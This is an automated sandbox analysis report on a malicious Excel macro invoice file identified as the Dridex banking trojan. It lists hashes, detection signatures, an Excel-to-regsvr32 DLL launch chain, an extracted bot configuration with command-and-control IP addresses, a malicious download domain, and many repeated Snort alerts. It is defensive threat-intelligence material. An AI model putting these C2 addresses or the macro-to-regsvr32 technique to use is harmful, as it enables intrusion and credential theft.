Play interactive tour

Edit tour

Analysis Report INV9698791470-20210111920647.xlsm

Overview

General Information

Sample Name:	INV9698791470-20210111920647.xlsm
Analysis ID:	338095
MD5:	9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:	6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:	a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Dridex e-Banking trojan

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Drops PE files

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

regsvr32.exe (PID: 1552 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1108 cmdline: -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)

DW20.EXE (PID: 2460 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804 MD5: 45A078B2967E0797360A2D4434C41DB4)

DWWIN.EXE (PID: 2452 cmdline: C:\Windows\system32\dwwin.exe -x -s 1804 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)

cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., ProcessId: 1552

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll., ProcessId: 1552

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.regsvr32.exe.460000.2.unpack

Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 4", "77.220.64.37:443", "80.86.91.27:3308", "5.100.228.233:3389", "46.105.131.65:1512"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\deibsjhv.dll	ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Show sources

Source: INV9698791470-20210111920647.xlsm	Virustotal: Detection: 29%			Perma Link
Source: INV9698791470-20210111920647.xlsm	ReversingLabs: Detection: 17%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\deibsjhv.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eb3kd1le[1].zip	Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49347 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49371 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49379 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49383 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49399 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49403 version: TLS 1.2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_0048CEF8 FindFirstFileExW,

4_2_0048CEF8

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\deibsjhv.dll

Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: eb3kd1le[1].zip.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Source: global traffic

DNS query: name: inmindppe.com

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 77.220.64.37:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 160.153.133.116:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49168
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49170
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49177
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49182
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49186
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49189
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49190
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49191
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49191
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49194
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49195
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49195
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49198
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49199
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49199
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49202
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49203
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49203
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49206
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49210
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49217
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49228
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49231
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49232
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49233
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49233
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49235
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49243
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49245
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49245
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49256
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49257
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49257
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49259
